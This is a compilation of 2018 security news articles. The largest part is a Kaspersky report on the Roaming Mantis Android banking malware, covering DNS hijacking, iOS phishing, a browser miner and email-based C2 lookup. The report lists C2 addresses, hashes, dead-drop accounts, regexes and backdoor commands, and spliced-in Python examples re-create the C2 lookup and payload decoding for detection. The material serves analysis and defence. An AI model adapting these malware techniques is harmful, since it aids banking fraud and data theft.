“When the LDAP server is not contactable by RecoverPoint, and a log in attempt is made to an LDAP linked account via a RecoverPoint web interface, LDAP credentials are leaked into the tomcat.log file. These credentials may remain in the log file indefinitely, providing opportunity for attackers with access to the RecoverPoint file system to obtain them and resulting in LDAP account compromise,” Foregenix notes.

The researchers also discovered that RecoverPoint ships with "root" password hashes for grub stored in /distribution.log, a file readable by any user. A CVE was initially issued for the flaw, but Dell apparently revoked it, claiming that the file would be readable only by root; the researchers, however, claim they could read the file as the www-data user.

Although the CVE was revoked, Dell did fix the flaw for new installations of RecoverPoint. “At the time of writing it was not clear whether the vendor would reinstate the CVE, or whether performing an upgrade would remove the hash from previous versions of the world-readable log file,” Foregenix says.

RecoverPoint was also found to use a hardcoded root password that the user cannot change unless they contact the vendor. An attacker knowing the password could “gain control over all of the devices by logging in at the local console, or gaining console access as an unprivileged user, and changing to root.”

A CVE was not issued for the vulnerability, but the vendor apparently said that a documentation update will make it clear that a dedicated script from the support team is necessary to change the password.

The sixth vulnerability resides in an insecure configuration option that results in LDAP credentials being sent by the RecoverPoint in clear text, thus potentially exposing them to eavesdroppers.

“When the LDAP simple bind configuration is used, credentials are sent from the RecoverPoint server in cleartext. This means that a man-in-the-middle attacker or an attacker who has gained access to the RecoverPoint using another vulnerability, can monitor the traffic and discover LDAP credentials which have been entrusted to the RecoverPoint,” Foregenix says.

The RecoverPoint documentation includes a warning about the insecure configuration, but the RecoverPoint menu itself does not include such an alert.


As EU Privacy Law Looms, Debate Swirls on Cybersecurity Impact
23.5.2018 securityweek Privacy

Days ahead of the implementation of a sweeping European privacy law, debate is swirling on whether the measure will have negative consequences for cybersecurity.

The controversy is about the so-called internet address book or WHOIS directory, which up to now has been a public database identifying the owners of websites and domains.

The database will become largely private under the forthcoming General Data Protection Regulation set to take effect May 25, since it contains protected personal information.

US government officials and some cybersecurity professionals fear that without the ability to easily find hackers and other malicious actors through WHOIS, the new rules could lead to a surge in cybercrime, spam and fraud.

Critics say the GDPR could take away an important tool used by law enforcement, security researchers, journalists and others.

The lockdown of the WHOIS directory comes after years of negotiations between EU authorities and ICANN, the nonprofit entity that administers the database and manages the online domain system.

ICANN -- the Internet Corporation for Assigned Names and Numbers -- approved a temporary plan last week that allows access for "legitimate" purposes, but leaves the interpretation to internet registrars, the companies that sell domains and websites.

Assistant Commerce Secretary David Redl, who heads the US government division for internet administration, last week called on the EU to delay enforcement of the GDPR for the WHOIS directory.

"The loss of access to WHOIS information will negatively affect law enforcement of cybercrimes, cybersecurity and intellectual property rights protection activities globally," Redl said.

Rob Joyce, who served as White House cybersecurity coordinator until last month, tweeted in April that "GDPR is going to undercut a key tool for identifying malicious domains on the internet," adding that "cyber criminals are celebrating GDPR."

Negative consequences?

Caleb Barlow, vice president at IBM security, also warned that the privacy law "may well have negative consequences that, ironically, run contrary to its original intent."

Barlow said in a blog post earlier this month that "cybersecurity professionals use (WHOIS) information to quickly stop cyberthreats" and that the GDPR restrictions could delay or prevent security firms from acting on these threats.

James Scott, a senior fellow at the Washington-based Institute for Critical Infrastructure Technology, acknowledged that the GDPR rules "could hinder security researchers and law enforcement."

"The information would likely still be discoverable with a warrant or possibly at the request of law enforcement, but the added anonymization layers would severely delay" the identification of malicious actors.

Some analysts say the concerns about cybercrime are overblown, and that sophisticated cybercriminals can easily hide their tracks from WHOIS.

Milton Mueller, a Georgia Tech professor and founder of the Internet Governance Project of independent researchers, said the notion of an upsurge in cybercrime stemming from the rule was "totally bogus."

"There's no evidence that most of the world's cybercrime is stopped or mitigated by WHOIS," Mueller told AFP.

"In fact some of the cybercrime is facilitated by WHOIS because the bad guys can go after that information too."

Mueller said the directory had been "exploited" for years by commercial entities, some of which resell the data, and authoritarian regimes for broad surveillance.

"It's fundamentally a matter of due process," he said.

"We all agree that when law enforcement has a reasonable cause, they can obtain certain documents, but WHOIS allows unfettered access without any due process check."

No delays

Akram Atallah, president of ICANN's global domains division, told AFP the organization had tried unsuccessfully to get an enforcement delay from the EU for the WHOIS directory to work out rules for access.

The temporary rule will strip any personal information out of the WHOIS directory but allow access to the data for "legitimate" purposes, Atallah noted.

"You will need to get permission to see the rest of the data," he said.

That means the registrars, which include companies that sell websites like GoDaddy, will need to determine who gets access or face hefty fines from the EU.

ICANN is working on a process of "accreditation" to grant access, but was unable to predict how long it would take to get a consensus among the government and private stakeholders in the organization.

Matthew Kahn, a Brookings Institution research assistant, said the firms keeping the data are more likely to deny requests rather than face EU penalties.

"With democracies under siege from online election interference and active-measures campaigns, this is no time to hamper governments' and security researchers' abilities to identify and arrest cyber threats," Kahn said on the Lawfare blog.


'I'm sorry', Facebook Boss Tells European Lawmakers
23.5.2018 securityweek Social

Facebook chief Mark Zuckerberg apologized to the European Parliament on Tuesday for the "harm" caused by a huge breach of users' data and by a failure to crack down on fake news.

But Zuckerberg's appearance failed to satisfy MEPs who accused him of dodging questions and criticized a format that gave the parliament's political leaders far more time to give long-winded speeches.

His livestreamed testimony in Brussels was the latest stop on a tour of apology for the Cambridge Analytica scandal that saw him quizzed for ten hours in the US Congress in April, and will take him to Paris on Wednesday.

Zuckerberg said that while Facebook has brought in new features to connect people, it had become clear in the last two years that they "haven't done enough to prevent these tools from being used for harm".

"And that goes for fake news, foreign interference in elections or developers misusing people's information. We didn't take a broad enough view of our responsibility," he said in his opening statement.

"That was a mistake, and I'm sorry for it."

'Too slow'

The European Parliament invited Zuckerberg in March after Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica.

The firm, which was working for US President Donald Trump's 2016 campaign, has since declared bankruptcy.

Zuckerberg originally tried to send a junior executive instead but finally bowed to pressure to appear. However he only agreed for it to be livestreamed on Monday after initially insisting on it being behind closed doors.

Appearing calm and unruffled during the 90-minute hearing, Zuckerberg welcomed the EU's sweeping new personal data protection rules, which come into effect in three days, saying that his website would be "fully compliant".

In that spirit, Zuckerberg said Facebook was bringing in new features including a special "clear history" button that would allow users to delete any cookies or browsing history details it stores.

Zuckerberg admitted that Facebook had been "too slow to identify Russian interference" in the 2016 US presidential ballot but was working with European governments for future elections.

In the run-up to last year's French elections Facebook "found and took down more than 30,000 fake accounts", he said.

'Pre-cooked format'

But some European lawmakers were still unhappy with the format in which Zuckerberg answered questions for only 25 minutes -- half as long as the time it took the parliament's political leaders to get through their long-winded questions.

"Today's pre-cooked format was inappropriate and ensured Zuckerberg could avoid our questions," Guy Verhofstadt, the European Parliament's Liberal leader, tweeted afterwards.

The former Belgian prime minister asked Zuckerberg during the hearing if he wanted to be remembered as a "genius who created a digital monster".

Manfred Weber, the German head of the centre-right European People's Party, the largest group in parliament, said the Facebook chief was "not very convincing" and "did not answer all our questions".

But European Parliament President Antonio Tajani -- who invited Zuckerberg and arranged the meeting -- called Zuckerberg's visit a "success" even if he said his apology was "not enough" and required follow up.

Zuckerberg meanwhile pledged that Facebook would make fresh investments to protect its users in the wake of the scandal -- with many of those in Europe where he plans to have 10,000 employees by the end of the year.

"It's going to take time to work through all of the changes we must make. But I'm committed to getting it right, and to making the significant investments needed to keep people safe," he added.

"I expect this will significantly impact our profitability. But I want to be clear: keeping people safe will always be more important than maximizing our profits."

Zuckerberg is due to meet French President Emmanuel Macron in Paris on Wednesday.


Chinese researchers from Tencent discovered exploitable flaws in several BMW models
23.5.2018 securityaffairs Security

A team of security researchers from Chinese firm Tencent has discovered 14 security vulnerabilities in several BMW models.
Researchers from the Tencent Keen Security Lab have discovered 14 vulnerabilities affecting several BMW models, including BMW i Series, BMW X Series, BMW 3 Series, BMW 5 Series, and BMW 7 Series.

The team of experts conducted a year-long study between January 2017 and February 2018. They reported the issues to BMW and after the company started rolling out security patches the researchers published technical details for the flaws.

“we systematically performed an in-depth and comprehensive analysis of the hardware and software on Head Unit, Telematics Control Unit and Central Gateway Module of multiple BMW vehicles.” reads the report published by Tencent Keen Security Lab.

“Through mainly focusing on the various external attack surfaces of these units, we discovered that a remote targeted attack on multiple Internet-Connected BMW vehicles in a wide range of areas is feasible, via a set of remote attack surfaces (including GSM Communication, BMW Remote Service, BMW ConnectedDrive Service, UDS Remote Diagnosis, NGTP protocol, and Bluetooth protocol).”

According to the experts, the vulnerabilities affect cars produced from the year 2012 onward. The white hat hackers focused their tests on the infotainment and telematics systems of the vehicles.

Eight of the vulnerabilities impact the infotainment system, four issues affect the telematics control unit (TCU), and two the central gateway module.


The TCU provides telephony services, accident assistance services, and implements remote controls of the doors and climate. The central gateway receives diagnostic messages from the TCU and the head unit and sends them to other Electronic Control Units (ECUs) on different CAN buses.

The experts discovered that an attacker could exploit the flaws, or chain some of them, to execute arbitrary code and take complete control of the affected component.

The experts demonstrated that a local attacker could hack BMW vehicles via a USB stick; in another attack scenario the researchers illustrated a remote hack through a software-defined radio.

Remote attacks can be conducted via Bluetooth or via cellular networks; remotely hacking a BMW car is very complex to carry out because the attacker would need to compromise a local GSM mobile network.


“Our research findings have proved that it is feasible to gain local and remote access to infotainment, T-Box components and UDS communication above certain speed of selected BMW vehicle modules and have been able to gain control of the CAN buses with the execution of arbitrary, unauthorized diagnostic requests of BMW in-car systems remotely,” state the researchers.

BMW issued some security updates to the backend systems and rolled out over-the-air patches for the TCU. The company also developed firmware updates that will be made available to customers at dealerships.

Neither BMW nor Keen Lab have revealed the list of affected models.

BMW awarded the Keen Lab as the first winner of the BMW Group Digitalization and IT Research Award.

In July 2017, the same team of security researchers from Chinese firm Tencent demonstrated how to remotely hack a Tesla Model vehicle.


North Korea-linked Sun Team APT group targets defectors with Android Malware
23.5.2018 securityaffairs  APT

A North Korea-linked APT group tracked as Sun Team has targeted North Korean defectors with a malicious app that was published in the official Google Play store.

The campaign, named RedDawn by security experts at McAfee, is the second campaign attributed to the same APT group this year.

Experts noticed that this is the first time the APT has abused the legitimate Google Play Store as a distribution channel. In a past campaign spotted in January, a group of North Korean defectors and journalists was targeted via social networks, email, and chat apps.

Researchers at McAfee discovered that the malware was on Google Play as ‘unreleased’ versions and accounts for only around 100 infections; they notified Google, which has already removed the threat from the store.

Once installed, the malware starts copying sensitive information from the device, including personal photos, contacts, and SMS messages, and then sends them to the threat actors.

McAfee found that the hackers managed to upload three applications to Google Play – based on the email accounts and Android devices used in the previous attack. The apps include Food Ingredients Info, Fast AppLock, and AppLockFree. They stayed in Google Play for about 2 months before being removed.

“Our recent discovery of the campaign we have named RedDawn on Google Play just a few weeks after the release of our report proves that targeted attacks on mobile devices are here to stay.” reads the post published by the security firm.

“We found three apps uploaded by the actor we named Sun Team, based on email accounts and Android devices used in the previous attack.”

The experts discovered three apps in the app store: the first, named 음식궁합 (Food Ingredients Info), provides information about food, while the remaining two, Fast AppLock and AppLockFree, are security applications.

While the 음식궁합 and Fast AppLock apps are data-stealing malware that receive commands and additional executable (.dex) files from a cloud control server, AppLockFree is reconnaissance malware that prepares the device for the installation of further payloads.

The attackers promoted 음식궁합 through a Facebook account with a fake profile, asking friends to install the malicious apps and offer feedback.

“After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks.” continues the report. “From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January.”

The logs collected by the malicious apps appear similar to other logs associated with the Sun Team APT group; in an apparent opsec failure, the malware developers used email addresses associated with the North Korean group.


Of course, we cannot exclude that this is an intentional false flag meant to make attribution of the attack harder.

The malware used in this campaign has been active at least since 2017; researchers observed numerous versions of the same code.

Threat actors are not native South Korean, but familiar with the culture and language.

“In the new malware on Google Play, we again see that the Korean writing in the description is awkward. As in the previous operation, the Dropbox account name follows a similar pattern of using names of celebrities, such as Jack Black, who appeared on Korean TV.” continues the analysis published by McAfee.

“These features are strong evidence that the actors behind these campaigns are not native South Koreans but are familiar with the culture and language. These elements are suggestive though not a confirmation of the nationality of the actors behind these malware campaigns.”

The attackers tested their malware on several mobile devices, while the exploit code found in cloud storage revealed modified “versions of publicly available sandbox escape, privilege escalation, code execution exploits.”

Some of the exploits were modified by the attackers, but experts believe that the developers are currently not skillful enough to develop their own zero-day exploits.

The Sun Team hackers were observed creating fake accounts using photos from social networks and the identities of South Koreans. In addition to stealing identities, the hackers are using texting and calling services to generate virtual phone numbers that allow them to sign up for online services in South Korea.


The ZipperDown Vulnerability could affect roughly 10% of iOS Apps
23.5.2018 securityaffairs  iOS

Experts from Chinese jailbreakers Pangu Lab, have recently discovered the ZipperDown flaw that could affect roughly 10% of iOS Apps.
ZipperDown, is a recently discovered vulnerability that could affect thousands of iOS apps and maybe also Android users.

The ZipperDown flaw was first reported by experts from Chinese jailbreakers Pangu Lab, who described it as a programming error.

The experts estimate 15,978 out of 168,951 iOS apps are affected, roughly 10% of the total. The list of affected apps includes popular applications such as Weibo, MOMO, NetEase Music, QQ Music and Kwai.

“While auditing iOS Apps from various customers, Pangu Lab noticed a common programming error, which leads to severe consequences such as data overwritten and even code execution in the context of affected Apps.” states the report published by the Pangu Lab.

“We created a signature for the issue and performed a large-scale search on our App analysis platform Janus. Surprisingly, we found that around 10% iOS Apps might be affected by the same or similar issues.”


Pangu Lab has not publicly released details of the flaw and is reporting the problem to the app publishers.

The hackers published a video PoC of the attack that shows a user downloading and using Weibo apps in an unsafe Wi-Fi environment. In this scenario, the attackers gain code execution in the context of user’s Weibo app by exploiting the ZipperDown vulnerability.

According to the experts, an attacker can trigger the ZipperDown flaw only if at least two unusual conditions are met. The first is that the attacker controls the Wi-Fi network to which the device is connected; the second is that the app must be running outside the iOS “sandbox.”

An attacker could exploit the flaw to run illicit applications on the affected device, but Pangu Lab added that the sandbox on both iOS and Android can effectively limit ZipperDown’s consequence.

“What can ZipperDown do?
It depends on the affected app and its privileges. In general, attackers could overwrite the affected app’s data, or even gain code execution in the context of the affected app. Note that the sandbox on both iOS and Android can effectively limit ZipperDown’s consequence.” continues the report.


Roaming Mantis dabbles in mining and phishing multilingually
22.5.2018 Kaspersky Phishing

In April 2018, Kaspersky Lab published a blogpost titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices. This activity is located mostly in Asia (South Korea, Bangladesh and Japan) based on our telemetry data. Potential victims were redirected by DNS hijacking to a malicious web page that distributed a Trojanized application spoofing Facebook or Chrome, which users then installed manually. The application actually contained an Android Trojan-Banker.

Soon after our publication it was brought to our attention that other researchers were also focused on this malware family. There was also another publication after we released our own blog. We’d like to acknowledge the good work of our colleagues from other security companies McAfee and TrendMicro covering this threat independently. If you are interested in this topic, you may find the following articles useful:

Android Banking Trojan MoqHao Spreading via SMS Phishing in South Korea
XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing
In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.

27 languages: targeting the world
In our previous blogpost we mentioned that a user attempting to connect to any websites while using a hijacked DNS, will be redirected to malicious landing pages on the rogue server. The landing page displays a popup message that corresponds to the language settings of the device and which urges the user to download a malicious apk file named ‘facebook.apk’ or ‘chrome.apk’.
Kaspersky Lab confirmed several languages hardcoded in the HTML source of the landing page to display the popup message.

The attackers substantially extended their target languages from four to 27, including European and Middle Eastern languages. And yet, they keep adding comments in Simplified Chinese.
But, of course, this multilingualism is not limited to the landing page. The most recent malicious apk (MD5: fbe10ce5631305ca8bf8cd17ba1a0a35) was also expanded to support 27 languages.

The landing page and malicious apk now support the following languages:

Arabic
Bulgarian
Bengali
Czech
German
English
Spanish
Hebrew
Hindi
Armenian
Indonesian
Italian
Japanese
Georgian
Korean
Malay
Polish
Portuguese
Russian
Serbo-Croatian
Thai
Tagalog
Turkish
Ukrainian
Vietnamese
Traditional Chinese
Simplified Chinese
We believe the attacker made use of an easy method to potentially infect more users, by translating their initial set of languages with an automatic translator.

Apple phishing site for iOS device
Previously, this criminal group focused on Android devices only. They have apparently changed their monetizing strategy since then. The attackers now target iOS devices as well, using a phishing site to steal user credentials. When a user connects to the landing page via iOS devices, the user is redirected to ‘http://security.apple.com/’:

A legitimate DNS server wouldn’t be able to resolve a domain name like that, because it simply doesn’t exist. However, a user connecting via a compromised router can access the landing page because the rogue DNS service resolves this domain to the IP address 172.247.116[.]155. The final page is a phishing page mimicking the Apple website with the very reassuring domain name ‘security.apple.com’ in the address bar of the browser.

The phishing site steals user ID, password, card number, card expiration date and CVV. The HTML source of the phishing site also supports 25 languages.

The supported languages are almost the same as on the landing pages and malicious apk files – only Bengali and Georgian are missing from the phishing site.
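The resolver check below is an added example, not part of Kaspersky's report: it tests the two symptoms described above, a canary name that should never resolve and unrelated names all answering with the same address, against either the system resolver or a constructed answer table so that it can run offline. The probe hostnames are an assumption; the canary name and the rogue address come from the report.

```python
"""Check a resolver for the Roaming Mantis DNS-hijack symptoms (added example)."""
import socket
from typing import Callable, Dict, List, Optional

# From the report: this name does not exist in the real Apple zone, so any
# answer for it is suspect; the rogue DNS answered with this address.
CANARY_NAME = "security.apple.com"
KNOWN_ROGUE_IPS = {"172.247.116.155"}
# Constructed probe list: unrelated hosts that normally resolve to different addresses.
PROBE_NAMES = ["www.kernel.org", "www.debian.org", "www.wikipedia.org"]

Resolver = Callable[[str], Optional[str]]


def system_resolver(name: str) -> Optional[str]:
    """Resolve through the OS resolver, which on a home network the router supplies."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def table_resolver(table: Dict[str, str]) -> Resolver:
    """Resolver backed by a constructed answer table, for offline demos and tests."""
    return lambda name: table.get(name)


def check_resolver(resolve: Resolver = system_resolver,
                   probes: List[str] = PROBE_NAMES) -> Dict[str, object]:
    """Return the individual signals and an overall 'hijack_suspected' verdict."""
    canary = resolve(CANARY_NAME)
    answers = {name: resolve(name) for name in probes}
    distinct = {ip for ip in answers.values() if ip}
    # Every probe answered, and all with the same address: the wildcard-style
    # redirection the report describes, where any site leads to the landing page.
    wildcard = len(probes) > 1 and all(answers.values()) and len(distinct) == 1
    return {
        "canary_answer": canary,
        "canary_resolves": canary is not None,
        "known_rogue_ip": canary in KNOWN_ROGUE_IPS,
        "wildcard_answers": wildcard,
        "probe_answers": answers,
        "hijack_suspected": canary is not None or wildcard,
    }


if __name__ == "__main__":
    # Constructed table imitating a router whose DNS settings were hijacked.
    hijacked = table_resolver({name: "172.247.116.155"
                               for name in [CANARY_NAME, *PROBE_NAMES]})
    print(check_resolver(hijacked)["hijack_suspected"])  # True
    print(check_resolver()["hijack_suspected"])          # live check of this host
```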

Web crypto mining for PC
Looking at the HTML source code of the landing page, we also discovered a new feature: web mining via a special script executed in the browser. More details about web miners can be found in our blogpost ‘Mining is the new black‘.

Coinhive is the most popular web miner used by cybercriminals around the world. When a user connects to the landing page from a PC, the CPU usage will drastically increase because of the crypto mining activity in the browser.

Real C2 destination is hidden in email subject
Older malicious apk samples include a legitimate website, accounts and a regular expression for retrieving the real C2 address, which the malware connects to by using a web socket. This process for obtaining its C2 changes in more recent samples, further described below:

MD5: f3ca571b2d1f0ecff371fb82119d1afe
  Date: March 29 2018
  File name: chrome.apk
  Legitimate web: http://my.tv.sohu[.]com/user/%s
  Email: n/a
  Accounts: 329505231, 329505325, 329505338
  RegExp: “<p>([\u4e00-\u9fa5]+?)</p>\s+</div>”
  Encrypted dex: \assets\db
  Encoding: Base64

MD5: 4d9a7e425f8c8b02d598ef0a0a776a58
  Date: April 7 2018
  File name: facebook.apk
  Legitimate web: https://www.baidu[.]com/p/%s/detail
  Email: n/a
  Accounts: haoxingfu88, haoxingfu12389, wokaixin158998
  RegExp: “公司</span>([\\u4e00-\\u9fa5]+?)<“
  Encrypted dex: \assets\data.sql
  Encoding: Base64 + zlib compression

MD5: fbe10ce5631305ca8bf8cd17ba1a0a35
  Date: May 14 2018
  File name: $random_num{8}.apk
  Legitimate web: n/a
  Email: @outlook.com
  Accounts: haoxingfu11, haoxingfu22, haoxingfu33
  RegExp: “abcd”
  Encrypted dex: \assets\data.sql
  Encoding: Base64 + zlib compression

Older samples retrieved the next C2 by accessing the legitimate website, extracting a Chinese string from a specific part of the HTML code, and decoding it. This scheme has been changed in the recent sample: instead of fetching a web page, it now retrieves the C2 over an email protocol.

The malware connects to an email inbox using hardcoded outlook.com credentials via POP3. It then obtains the email subject (in Chinese) and extracts the real C2 address using the string “abcd” as an anchor.
The old and new decoding functions are exactly the same.

We decoded the following next stage C2 servers:

220.136.78[.]40
220.136.73[.]107
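
The dead-drop C2 scheme from the table and paragraphs above, as an added example that is not Kaspersky's code: it expands the URL templates over the embedded accounts, applies the listed regular expressions to constructed page snippets, anchors on “abcd” in a constructed mail subject, and flags proxy-log URLs that hit the listed profiles. How the extracted token is decoded into an address is not described in the report and is not reproduced; the snippets, the subject line and the assumption that the token sits between two “abcd” markers are constructed for the example.

```python
"""Dead-drop C2 lookup of the three Roaming Mantis apk variants (added example)."""
import re
from typing import Dict, List, Optional

# URL templates, account lists and regular expressions as listed in the report.
VARIANTS: Dict[str, dict] = {
    "chrome.apk": {
        "template": "http://my.tv.sohu[.]com/user/%s",
        "accounts": ["329505231", "329505325", "329505338"],
        "regexp": r"<p>([\u4e00-\u9fa5]+?)</p>\s+</div>",
    },
    "facebook.apk": {
        "template": "https://www.baidu[.]com/p/%s/detail",
        "accounts": ["haoxingfu88", "haoxingfu12389", "wokaixin158998"],
        "regexp": r"公司</span>([\u4e00-\u9fa5]+?)<",
    },
}
SUBJECT_ANCHOR = "abcd"  # newest variant: anchor inside the POP3 mail subject


def deaddrop_urls(variant: str) -> List[str]:
    """Expand the %s template once per embedded account (defanged as in the report)."""
    spec = VARIANTS[variant]
    return [spec["template"] % acct for acct in spec["accounts"]]


def extract_from_html(variant: str, html: str) -> Optional[str]:
    """Pull the Chinese token out of a fetched profile page with the sample's regexp."""
    match = re.search(VARIANTS[variant]["regexp"], html)
    return match.group(1) if match else None


def extract_from_subject(subject: str) -> Optional[str]:
    """Newest variant: token between two 'abcd' markers (the delimiting is assumed)."""
    anchor = re.escape(SUBJECT_ANCHOR)
    match = re.search(anchor + r"(.+?)" + anchor, subject)
    return match.group(1) if match else None


def is_deaddrop_fetch(url: str) -> bool:
    """Detection side: does a proxied URL hit one of the listed dead-drop profiles?

    Matched against the live (non-defanged) form of the templates, so that only
    the specific accounts embedded in the samples are flagged, not the whole site.
    """
    for spec in VARIANTS.values():
        live = spec["template"].replace("[.]", ".")
        for acct in spec["accounts"]:
            if url == live % acct:
                return True
    return False


# Constructed inputs standing in for fetched pages and a mailbox subject.
SAMPLE_HTML_1 = '<div class="bio"><p>你好世界</p>\n  </div>'
SAMPLE_HTML_2 = "<span>公司</span>深圳腾讯<br/>"
SAMPLE_SUBJECT = "通知abcd密文数据abcd"


if __name__ == "__main__":
    print(deaddrop_urls("chrome.apk"))
    print(extract_from_html("chrome.apk", SAMPLE_HTML_1))   # 你好世界
    print(extract_from_html("facebook.apk", SAMPLE_HTML_2)) # 深圳腾讯
    print(extract_from_subject(SAMPLE_SUBJECT))             # 密文数据
    print(is_deaddrop_fetch("https://www.baidu.com/p/haoxingfu88/detail"))  # True
```
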
Backdoor command “ping”
Kaspersky Lab observed that the previous malicious apk (MD5:f3ca571b2d1f0ecff371fb82119d1afe) had 18 backdoor commands to confirm victims’ environments and to control devices.
According to our analysis, the recent malicious apk (MD5:fbe10ce5631305ca8bf8cd17ba1a0a35) now implements 19 backdoor commands: “ping” was added.

The backdoor commands in the recent sample are as follows:

sendSms
setWifi
gcont
lock
bc
setForward
getForward
hasPkg
setRingerMode
setRecEnable
reqState
showHome
getnpki
http
onRecordAction
call
get_apps
show_fs_float_window
ping NEW
This additional command calls the OS ping command with the IP address of the C2 server. By running this, the attackers validate the availability of the server, packet travel time or detect network filtering in the target network. This feature can also be used to detect semi-isolated research environments.

Auto-generating apk file and filename
Roaming Mantis uses a very simple detection evasion trick on the malicious server. It entails the landing page generating a filename for the malicious apk file using eight random numbers.

Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018. It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes. This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.
However, the malicious apk still contains a loader inside ‘classes.dex’ and an encrypted payload inside ‘\assets\data.sql’ that are identical to those in the previous variants. For security researchers, we have added MD5 hashes of the decrypted payloads without hashes of the whole apk files in the IoC of this report, as well as a few full apk hashes that were uploaded to VirusTotal.
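The triage script below is an added example, not Kaspersky's tooling: it pulls the payload named in the table (assets/data.sql or assets/db) out of an apk, strips the Base64 or Base64 + zlib encoding layer listed there, and hashes the decoded payload so that per-download apks with differing whole-file hashes can still be matched, as the paragraph above recommends. The apk is constructed in memory; any cipher applied beneath the encoding layer is not described in the report and is not reproduced.

```python
"""Triage a Roaming Mantis-style apk by hashing its decoded payload (added example)."""
import base64
import binascii
import hashlib
import io
import zipfile
import zlib
from typing import Optional, Tuple

PAYLOAD_PATHS = ("assets/data.sql", "assets/db")  # from the table; newest first
DEX_MAGIC = b"dex\n"  # a dex file starts with "dex\n" followed by its version


def decode_payload(blob: bytes) -> Tuple[str, Optional[bytes]]:
    """Strip the encoding layer: try Base64 + zlib first, then plain Base64."""
    try:
        raw = base64.b64decode(blob)
    except binascii.Error:
        return "unknown", None
    try:
        return "base64+zlib", zlib.decompress(raw)
    except zlib.error:  # oldest variant: plain Base64, nothing to inflate
        return "base64", raw


def triage_apk(apk_bytes: bytes) -> Optional[dict]:
    """Return payload hash and encoding, or None if the apk does not fit the pattern."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        names = set(apk.namelist())
        if "classes.dex" not in names:  # the loader the report describes
            return None
        for path in PAYLOAD_PATHS:
            if path not in names:
                continue
            encoding, payload = decode_payload(apk.read(path))
            if payload is None:
                return None
            return {
                "payload_path": path,
                "encoding": encoding,
                "looks_like_dex": payload.startswith(DEX_MAGIC),
                "payload_md5": hashlib.md5(payload).hexdigest(),
                "apk_md5": hashlib.md5(apk_bytes).hexdigest(),
            }
    return None


def build_sample_apk(payload: bytes, path: str = "assets/data.sql",
                     use_zlib: bool = True, stamp: bytes = b"") -> bytes:
    """Constructed stand-in for a downloaded apk: loader stub plus encoded payload.

    'stamp' mimics the per-download variation that makes whole-file hashes differ.
    """
    encoded = base64.b64encode(zlib.compress(payload) if use_zlib else payload)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as apk:
        apk.writestr("classes.dex", b"loader stub (constructed)")
        apk.writestr(path, encoded)
        if stamp:
            apk.writestr("assets/stamp", stamp)
    return buf.getvalue()


# Constructed payload with a dex-style header and filler body.
FAKE_DEX = DEX_MAGIC + b"035\x00" + b"constructed payload body"


if __name__ == "__main__":
    first = triage_apk(build_sample_apk(FAKE_DEX, stamp=b"download-1"))
    second = triage_apk(build_sample_apk(FAKE_DEX, stamp=b"download-2"))
    print("apk hashes differ:", first["apk_md5"] != second["apk_md5"])        # True
    print("payload hashes match:", first["payload_md5"] == second["payload_md5"])  # True
```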

Rapidly improving malicious apk and landing pages
Since our first report, Roaming Mantis has evolved quickly. The update history shows how rapidly the threat has been growing:

The actors behind it have been quite active in improving their tools. As seen in the graph below, which shows the unique detected user counts per day according to KSN data, the count increased on May 5. That date is very close to the update date of the new features on the landing pages.

Geographical expansion
Kaspersky Lab products detect Roaming Mantis’s malicious apk files as ‘Trojan-Banker.AndroidOS.Wroba’. Below is the data from Kaspersky Security Network (KSN) based on the verdict ‘Trojan-Banker.AndroidOS.Wroba.al’ from May 1 to May 10, 2018.

It’s clear from this that South Korea, Bangladesh and Japan are no longer the worst affected countries; instead, Russia, Ukraine and India bore the brunt. According to data gathered between February 9 and April 9, the unique user count was 150. It’s worth mentioning that the most recent data shows more than 120 users of Kaspersky Lab products were affected in just 10 days.
Also, it’s important to note that what we see in the KSN data is probably a tiny fraction of the overall picture. There are two reasons for that:

Some users may be using other AV products or no products at all.
Roaming Mantis, after all, uses DNS hijacking, which prevents even our customers from reporting a detection. However, some devices made it through – probably due to switching to cellular data or connecting to another Wi-Fi network.
Conclusions
The Roaming Mantis campaign evolved significantly in a short period of time. The earliest report of this attack was made public by researchers from McAfee in August 2017. At that time, the Roaming Mantis distribution method was SMS and there was one target: South Korea. When we first reported this attack in April 2018, it had already implemented DNS hijacking and expanded its targets to the wider Asian region.
In our report of April this year, we called it an active and rapidly changing threat. New evidence shows a dramatic expansion in the target geography to include countries from Europe, the Middle East and beyond by supporting 27 languages in total. The attackers have also gone beyond Android devices by adding iOS as a new target, and recently started targeting PC platforms – the landing page PC users are redirected to is now equipped with the Coinhive web miner.
The evasion techniques used by Roaming Mantis have also become more sophisticated. Recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server-side dynamic generation of changing apk files and filenames, and an additional backdoor command that can help identify research environments.
The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.

For our previous findings, please refer to the Securelist post Roaming Mantis uses DNS hijacking to infect Android smartphones.

Kaspersky products detect this malware as:

HEUR:Trojan-Banker.AndroidOS.Wroba
Kaspersky Lab products block the Coinhive web miner for PC.

IoCs
Malicious hosts:

Malicious apks:

classes.dex:

Decrypted payload (dex file) from \assets\data.sql:



Tech Firms Coordinate Disclosure of New Meltdown, Spectre Flaws
22.5.2018 securityweek  Vulnerability

Intel, AMD, ARM, IBM, Microsoft and other major tech companies on Monday released updates, mitigations and advisories for two new variants of the speculative execution attack methods known as Meltdown and Spectre.

In January, researchers from several organizations warned that processors from Intel, AMD, ARM and other companies are affected by vulnerabilities that allow malicious applications to bypass memory isolation mechanisms and gain access to sensitive data.

